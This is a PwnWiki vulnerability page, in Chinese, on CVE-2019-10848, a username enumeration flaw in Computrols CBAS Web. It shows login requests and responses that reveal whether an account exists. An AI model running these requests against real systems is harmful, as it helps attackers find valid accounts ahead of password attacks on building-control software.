CVE-2019-10848 Computrols CBAS Web 用戶名枚舉漏洞

漏洞影響

19.0.0及以下

測試無效賬戶

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62

Response

<!-- Failed login comments appear here -->
<p class="alert-error">randomuser</p>

測試有效賬戶

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s

Response

<!-- Failed login comments appear here -->
<p class="alert-error">Invalid username/password combination.  Please try again!</p>

Anonymous

Search

CVE-2019-10848 Computrols CBAS Web 用戶名枚舉漏洞

Namespaces

More

Page actions

漏洞影響

測試無效賬戶

測試有效賬戶

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

CVE-2019-10848 Computrols CBAS Web 用戶名枚舉漏洞

漏洞影響

測試無效賬戶

測試有效賬戶

Navigation

Wiki tools

Page tools